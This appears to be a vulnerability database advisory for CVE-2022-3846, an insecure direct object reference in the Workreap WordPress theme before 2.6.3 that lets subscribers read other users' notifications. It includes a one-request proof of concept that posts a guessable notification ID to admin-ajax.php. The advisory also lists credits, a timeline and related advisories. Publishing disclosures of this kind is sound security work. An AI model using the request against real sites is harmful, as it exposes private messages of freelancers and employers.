Workreap – Freelance Marketplace and Directory < 2.6.3 – Subscriber+ Private Message Disclosure via IDOR | CVE 2022-3846 | Theme Vulnerabilities

Description

The theme has a vulnerability with the notifications feature as it's possible to read any user's notification (employer or freelancer) as the notification ID is brute-forceable.

Proof of Concept

POST /testt/wp-admin/admin-ajax.php HTTP/2
Host: host
Cookie: 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 61

action=workreap_read_notification&id=6233&security=<nonce>

Affects Themes

Fixed in 2.6.3

References

CVE

Classification

Type

IDOR

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Veshraj Ghimire

Submitter

Veshraj Ghimire

Submitter website

https://veshrajghimire.com.np

Submitter twitter

Verified

Yes

WPVDB ID

6220c7ef-69a6-49c4-9c56-156b945446af

Timeline

Publicly Published

2022-11-12 (about 1 years ago)

Added

2022-11-11 (about 1 years ago)

Last Updated

2022-11-11 (about 1 years ago)

Other

Published

Title

Published

2024-03-20

Title

Plugin Permalink < 2.4.3.2 - Missing Authorization via get_uri_editor

Published

2023-12-19

Title

WPDashboardNotes < 1.0.11 - Unauthorised Deletion of Private Notes

Published

2023-09-05

Title

Sunshine Photo Cart < 3.0 - Insecure Direct Object Reference to Order Manipulation

Published

2024-05-14

Title

BuddyBoss Platform < 2.6.0 - Insecure Direct Object Reference on Like Comment

Published

2023-07-07

Title

Getnet Argentina para Woocommerce < 0.0.5 - Unauthenticated Authorization Bypass